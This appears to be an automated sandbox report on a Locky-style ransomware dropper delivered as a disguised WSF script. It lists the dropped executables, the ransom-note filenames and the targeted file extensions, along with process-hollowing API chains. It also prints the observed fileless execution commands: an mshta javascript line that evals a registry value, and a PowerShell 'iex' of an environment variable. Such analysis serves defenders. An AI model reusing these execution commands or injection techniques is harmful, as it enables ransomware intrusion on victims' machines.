Source:	Binary string: backup.back.awg.apj.ait.agdl.ads.adb.acr.ach.accdt.accdr.accde.ab4.3pr.3fr.vmxf.vmsd.vhdx.vhd.vbox.stm.st7.rvt.qcow.qed.pif.pdb.pab.ost.ogg.nvram.ndf.m4p.m2ts.log.hpp.hdd.groups.flvv.edb.dit.dat.cmt.bin.aiff.xl source: a1.exe
Source:	Binary string: @_HELP_instructions.html_HELP_instructions.bmp_HELP_instructions.txt_Locky_recover_instructions.bmp_Locky_recover_instructions.txttmpwinntApplication DataAppDataProgram Files (x86)Program Filestempthumbs.db$Recycle.BinSystem Volume InformationBootWindows.yuv.ycbcra.xis.x3f.x11.wpd.tex.sxg.stx.st8.st5.srw.srf.sr2.sqlitedb.sqlite3.sqlite.sdf.sda.sd0.s3db.rwz.rwl.rdb.rat.raf.qby.qbx.qbw.qbr.qba.py.psafe3.plc.plus_muhd.pdd.p7c.p7b.oth.orf.odm.odf.nyf.nxl.nx2.nwb.ns4.ns3.ns2.nrw.nop.nk2.nef.ndd.myd.mrw.moneywell.mny.mmw.mfw.mef.mdc.lua.kpdx.kdc.kdbx.kc2.jpe.incpas.iiq.ibz.ibank.hbk.gry.grey.gray.fhd.fh.ffd.exf.erf.erbsql.eml.dxg.drf.dng.dgc.des.der.ddrw.ddoc.dcs.dc2.db_journal.csl.csh.crw.craw.cib.ce2.ce1.cdrw.cdr6.cdr5.cdr4.cdr3.bpw.bgt.bdb.bay.bank.backupdb.backup.back.awg.apj.ait.agdl.ads.adb.acr.ach.accdt.accdr.accde.ab4.3pr.3fr.vmxf.vmsd.vhdx.vhd.vbox.stm.st7.rvt.qcow.qed.pif.pdb.pab.ost.ogg.nvram.ndf.m4p.m2ts.log.hpp.hdd.groups.flvv.edb.dit.dat.cmt.bin.aiff.xlk.wad.tlg.st6.st4.say.sas7bdat.qbm.qbb.ptx.pfx.pef
Source:	Binary string: ConhostV2.pdbUGP source: conhost.exe
Source:	Binary string: wow64cpu.pdb source: regsvr32.exe
Source:	Binary string: wow64.pdbUGP source: regsvr32.exe
Source:	Binary string: conhost.pdbUGP source: conhost.exe
Source:	Binary string: _HELP_instructions.html_HELP_instructions.bmp_HELP_instructions.txt_Locky_recover_instructions.bmp_Locky_recover_instructions.txttmpwinntApplication DataAppDataProgram Files (x86)Program Filestempthumbs.db$Recycle.BinSystem Volume InformationBootWindows.yuv.ycbcra.xis.x3f.x11.wpd.tex.sxg.stx.st8.st5.srw.srf.sr2.sqlitedb.sqlite3.sqlite.sdf.sda.sd0.s3db.rwz.rwl.rdb.rat.raf.qby.qbx.qbw.qbr.qba.py.psafe3.plc.plus_muhd.pdd.p7c.p7b.oth.orf.odm.odf.nyf.nxl.nx2.nwb.ns4.ns3.ns2.nrw.nop.nk2.nef.ndd.myd.mrw.moneywell.mny.mmw.mfw.mef.mdc.lua.kpdx.kdc.kdbx.kc2.jpe.incpas.iiq.ibz.ibank.hbk.gry.grey.gray.fhd.fh.ffd.exf.erf.erbsql.eml.dxg.drf.dng.dgc.des.der.ddrw.ddoc.dcs.dc2.db_journal.csl.csh.crw.craw.cib.ce2.ce1.cdrw.cdr6.cdr5.cdr4.cdr3.bpw.bgt.bdb.bay.bank.backupdb.backup.back.awg.apj.ait.agdl.ads.adb.acr.ach.accdt.accdr.accde.ab4.3pr.3fr.vmxf.vmsd.vhdx.vhd.vbox.stm.st7.rvt.qcow.qed.pif.pdb.pab.ost.ogg.nvram.ndf.m4p.m2ts.log.hpp.hdd.groups.flvv.edb.dit.dat.cmt.bin.aiff.xlk.wad.tlg.st6.st4.say.sas7bdat.qbm.qbb.ptx.pfx.pef.
Source:	Binary string: wow64cpu.pdbUGP source: regsvr32.exe
Source:	Binary string: wow64win.pdbUGP source: regsvr32.exe
Source:	Binary string: ConhostV2.pdb source: conhost.exe
Source:	Binary string: conhost.pdb source: conhost.exe
Source:	Binary string: wow64.pdb source: regsvr32.exe

Binary contains paths to development resources

Show sources

Source: powershell.exe	Binary or memory string: AutoItX.slnMo
Source: powershell.exe	Binary or memory string: AutoItX.slnY

Classification label

Show sources

Source: classification engine

Classification label: mal100.evad.rans.phis.winWSF@13/12@6/27

Contains functionality for error logging

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_1_0040200D CryptMsgCountersignEncoded,LoadMenuA,CreateMenu,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,CryptMsgDuplicate,GetStockObject,GetStockObject,SelectObject,GetStockObject,GetObjectA,SendMessageA,OffsetRect,GetPixel,BeginPaint,DrawTextA,DefWindowProcA,BeginPaint,GetClientRect,DrawTextA,EndPaint,PostQuitMessage,DefWindowProcA,GetDlgItem,CreateWindowExA,BeginPaint,SetWindowPos,SetWindowLongA,BeginPaint,MultiByteToWideChar,BeginPaint,MultiByteToWideChar,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowRect,GetCursorPos,PtInRect,SendMessageA,GetScrollPos,SetScrollPos,InvalidateRect,BeginPaint,LockResource,GetClientRect,DrawTextA,EndPaint,MoveWindow,SetFocus,FreeResource,PostQuitMessage,GetDC,GetTextMetricsA,ReleaseDC,GetSystemMetrics,CreateWindowExA,LoadStringA,FindResourceA,LoadResource,LockResource,CharNextA,SetScrollRange,SetScrollPos,SendMessageA,GetLastError,CreateWindowExA,ImageList_Create,SendMessageA,SendMessageA,ICLocate,ICOpen,ICSendMessage,ICClose,ICInfo,ICGetInfo,SendM

3_1_0040200D

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2C080 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	5_2_00B2C080
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008CC080 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	9_2_008CC080
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104C080 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	12_2_0104C080

Contains functionality to check free disk space

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_02589CE9 GetLogicalDrives,GetDriveTypeW,GetDiskFreeSpaceExW,GetVolumeInformationW,

3_2_02589CE9

Contains functionality to instantiate COM classes

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_0258B6BB __EH_prolog,GetTickCount,GetTickCount,__aullrem,Sleep,GetTickCount,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,VariantInit,SysStringByteLen,SysAllocStringByteLen,VariantClear,VariantClear,VariantClear,VariantInit,VariantClear,Sleep,

3_2_0258B6BB

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

3_1_0040200D

Creates files inside the user directory

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\74SMJV2C\counter[1].js

Creates temporary files

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\admin\AppData\Local\Temp\a.txt

Might use command line arguments

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Menu	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Bitmap	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Edit	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: scrollbar	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: TEXT	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: ToolbarWindow32	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: vidc	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: vidc	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: sign	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: sign	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: sign	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: NoFold	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Index	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: FLOPYDRIVE	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: HARDDRIVE	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: *.txt	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: ToolbarWindow32	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: kernel32	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Heap	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: shell32	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: SysListView32	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Crea	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: mode	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: (%d)	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: 0x%08x	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: 0x%08x	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: 0x%08x	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Real-Time	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: High	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Idle	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Command line argument: Normal	3_1_0040200D

Parts of this applications are using Borland Delphi (Probably coded in Delphi)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_USERS\Software\Borland\Delphi\Locales

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\35849a60913000fe067eb742f5cabec9\mscorlib.ni.dll

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	WMI Queries: IWbemServices::GetObject - ROOT\CIMV2 : Win32_Process
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	WMI Queries: IWbemServices::GetObject - ROOT\CIMV2 : Win32_ProcessStartup
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Reads ini files

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

File read: C:\Users\admin\Desktop\desktop.ini

Reads software policies

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key opened: HKEY_USERS\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Ground-Label-004117618.doc-2161f8cf7b6c1a1a3a6fdc41083566a5.wsf'
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\a1.exe 'C:\Users\admin\AppData\Local\Temp\a1.exe'
Source: unknown	Process created: C:\Users\admin\AppData\Local\Temp\a2.exe 'C:\Users\admin\AppData\Local\Temp\a2.exe'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' javascript:Blw24ZfAP='Wju';Ta3=new%20ActiveXObject('WScript.Shell');y2wk8tsp='OcRo8M';w4EEw5=Ta3.RegRead('HKCU\\software\\jc9v3o\\Ao1TeK6zT');cf6Ltc='YA5O';eval(w4EEw5);Rzo9PdzY='p012X';
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' iex $env:jxys
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\admin\AppData\Local\Temp\a1.exe 'C:\Users\admin\AppData\Local\Temp\a1.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\admin\AppData\Local\Temp\a2.exe 'C:\Users\admin\AppData\Local\Temp\a2.exe'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' iex $env:jxys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Contains functionality to call native functions

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B252A0 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,	5_2_00B252A0
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B1CA28 NtSuspendProcess,OpenProcess,NtSuspendProcess,CloseHandle,	5_2_00B1CA28
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF23CC NtQueryInformationProcess,	5_2_00AF23CC
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B27E10 RegOpenKeyExW,RegCreateKeyW,RegCloseKey,RegOpenKeyExW,NtSetValueKey,RegCloseKey,	5_2_00B27E10
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B27D48 RegOpenKeyExW,NtDeleteValueKey,RegCloseKey,	5_2_00B27D48
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B258B8 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,DeleteFileW,	5_2_00B258B8
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B24588 CreateProcessW,CreateProcessW,Sleep,TerminateProcess,CloseHandle,CloseHandle,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtWriteVirtualMemory,GetCurrentProcess,NtUnmapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,VirtualFree,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,	5_2_00B24588
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B27C6C RegOpenKeyExW,NtQueryValueKey,RegCloseKey,	5_2_00B27C6C
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2349C CreateProcessW,CreateProcessW,Sleep,TerminateProcess,CloseHandle,CloseHandle,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	5_2_00B2349C
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B240E8 OpenProcess,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,CloseHandle,CloseHandle,CloseHandle,	5_2_00B240E8
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B24D70 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,	5_2_00B24D70
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AE6B92 NtdllDefWindowProc_A,	5_2_00AE6B92
Source: C:\Windows\System32\conhost.exe	Code function: 8_2_00007FF6C8BE1010 EventRegister,EventSetInformation,GetCommandLineW,wcstok_s,wcstoul,wcstok_s,NtQueryVolumeInformationFile,LoadLibraryExW,GetProcAddress,SetProcessShutdownParameters,RtlExitUserThread,wcsncmp,wcsncmp,FreeLibrary,GetLastError,GetLastError,GetLastError,EventUnregister,	8_2_00007FF6C8BE1010
Source: C:\Windows\System32\conhost.exe	Code function: 8_2_00007FF6C8BE1300 RtlOpenCurrentUser,RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,GetProcessHeap,HeapAlloc,NtQueryValueKey,GetProcessHeap,HeapFree,NtClose,NtClose,	8_2_00007FF6C8BE1300
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00892484 NtWow64ReadVirtualMemory64,	9_2_00892484
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0089263C NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,	9_2_0089263C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008923F8 NtWow64QueryInformationProcess64,	9_2_008923F8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C4588 CreateProcessW,CreateProcessW,Sleep,TerminateProcess,CloseHandle,CloseHandle,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtWriteVirtualMemory,GetCurrentProcess,NtUnmapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,VirtualFree,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,	9_2_008C4588
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C0CFC GetModuleHandleA,GetProcAddress,VirtualAlloc,NtQuerySystemInformation,VirtualFree,VirtualFree,	9_2_008C0CFC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008923CC NtQueryInformationProcess,	9_2_008923CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C7C6C 6E135A60,NtQueryValueKey,RegCloseKey,	9_2_008C7C6C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C7E10 6E135A60,6E15DB00,RegCloseKey,6E135A60,NtSetValueKey,RegCloseKey,	9_2_008C7E10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C58B8 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,6E15D4C0,	9_2_008C58B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C4D70 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,	9_2_008C4D70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008BCA28 NtSuspendProcess,OpenProcess,NtSuspendProcess,CloseHandle,	9_2_008BCA28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C52A0 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,	9_2_008C52A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008D54DC NtdllDefWindowProc_A,NtdllDefWindowProc_A,	9_2_008D54DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008D543C NtdllDefWindowProc_A,NtdllDefWindowProc_A,	9_2_008D543C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C40E8 OpenProcess,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,CloseHandle,CloseHandle,CloseHandle,	9_2_008C40E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C349C CreateProcessW,CreateProcessW,Sleep,TerminateProcess,CloseHandle,CloseHandle,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	9_2_008C349C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C7D48 6E135A60,NtDeleteValueKey,RegCloseKey,	9_2_008C7D48
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0103CA28 NtSuspendProcess,OpenProcess,NtSuspendProcess,CloseHandle,	12_2_0103CA28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01044588 CreateProcessW,CreateProcessW,Sleep,TerminateProcess,CloseHandle,CloseHandle,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtWriteVirtualMemory,GetCurrentProcess,NtUnmapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,VirtualFree,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,	12_2_01044588
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104349C CreateProcessW,CreateProcessW,Sleep,TerminateProcess,CloseHandle,CloseHandle,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	12_2_0104349C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0105543C NtdllDefWindowProc_A,NtdllDefWindowProc_A,	12_2_0105543C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01047C6C 6E135A60,NtQueryValueKey,RegCloseKey,	12_2_01047C6C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_010452A0 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,	12_2_010452A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01047E10 6E135A60,6E15DB00,RegCloseKey,6E135A60,NtSetValueKey,RegCloseKey,	12_2_01047E10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01044D70 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,	12_2_01044D70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_010554DC NtdllDefWindowProc_A,NtdllDefWindowProc_A,	12_2_010554DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01047D48 6E135A60,NtDeleteValueKey,RegCloseKey,	12_2_01047D48
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_010458B8 CreateEventA,GetCurrentProcessId,CreateProcessW,Sleep,NtCreateSection,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,TerminateProcess,CloseHandle,CloseHandle,6E15D4C0,	12_2_010458B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_010440E8 OpenProcess,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,CloseHandle,CloseHandle,CloseHandle,	12_2_010440E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_010123CC NtQueryInformationProcess,	12_2_010123CC

Contains functionality to shutdown / reboot the system

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B27AFC Sleep,ExitWindowsEx,	5_2_00B27AFC
